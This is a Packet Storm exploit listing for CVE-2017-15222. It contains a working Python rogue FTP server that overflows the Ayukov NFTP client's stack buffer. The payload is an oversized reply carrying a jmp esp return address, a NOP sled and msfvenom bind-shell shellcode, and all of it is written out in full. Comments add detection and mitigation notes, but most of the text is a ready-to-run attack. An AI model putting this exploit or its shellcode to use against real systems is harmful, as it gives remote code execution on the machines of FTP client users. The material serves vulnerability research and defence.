
Ayukov NFTP FTP Client 2.0 Buffer Overflow

2019-01-02 00:00:00
Uday Mittal
packetstormsecurity.com
30

0.589 Medium

EPSS

Percentile

97.8%

# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python

"""Rogue FTP server reproducing the NFTP client overflow described in the header.

What this file shows: a client that connects to ``IP``:``port`` gets a
normal-looking greeting and login exchange, then one FTP reply of roughly
15 KB (``evil``).  Per the header, the client copies that reply into a
fixed-size stack buffer; the saved return address sits at offset 4116 and is
overwritten with the USER32.dll ``jmp esp`` address, after which ``buf`` runs.

Defender notes (grounded in the header and the code below):

- Affected versions are stated as "below 2.0"; the fix is upgrading the client.
- The return address is specific to the USER32.dll build listed in the header
  (XP SP3, ASLR: False).  On a host with a different USER32.dll the same input
  presumably still crashes the client without running the payload; the client
  crash on receipt of an oversized reply is the host-side symptom to look for.
- On the wire this is a single FTP reply line of about 15,000 bytes consisting
  mostly of one repeated character.  A rule on FTP reply-line length, or an FTP
  proxy that caps reply length, catches it before the client parses it.
- Note that the client is the victim here: exposure requires the client to be
  pointed at a hostile server, so restricting which FTP servers clients may
  reach is a compensating control.
"""

import socket

# Address/port the rogue server listens on; the vulnerable client must connect here.
IP = '192.168.43.28'
port = 21

# Payload bytes generated by msfvenom (command in the header).  Opaque to this
# script: it is only concatenated into ``evil`` below.
buf = ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"

# The single oversized reply line.  Layout, following the header:
#   "A"*4116             filler up to the saved return address ("EIP Location: 4116")
#   "\x10\xb3\x45\x7e"   0x7e45b310 in little-endian, the USER32.dll jmp esp above
#   "\x90"*100           NOP sled ahead of the payload
#   buf                  msfvenom payload
#   "D"*10425            trailing padding
# Total = 4116 + 4 + 100 + len(buf) + 10425 bytes, i.e. about 15 KB on one line
# terminated by CRLF — the wire-level feature a detection rule can key on.
evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 + buf + "D"*10425

# Stand up the listener.  The bare except hides the real bind error, and after a
# failed bind ``s`` is never assigned, so the accept loop below fails with a
# NameError instead of exiting cleanly.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((IP, port))
    s.listen(20)
    print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
    print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

# Scripted FTP dialogue (Python 2 syntax: print statement, str is bytes).
# Whatever the client sends is read and printed but never parsed; replies are
# sent in fixed order regardless of the command: 220 greeting, 331, 230, then
# the oversized ``evil`` line (the overflow), then a 257.  Each connection is
# handled once and never closed.
while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send(evil + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')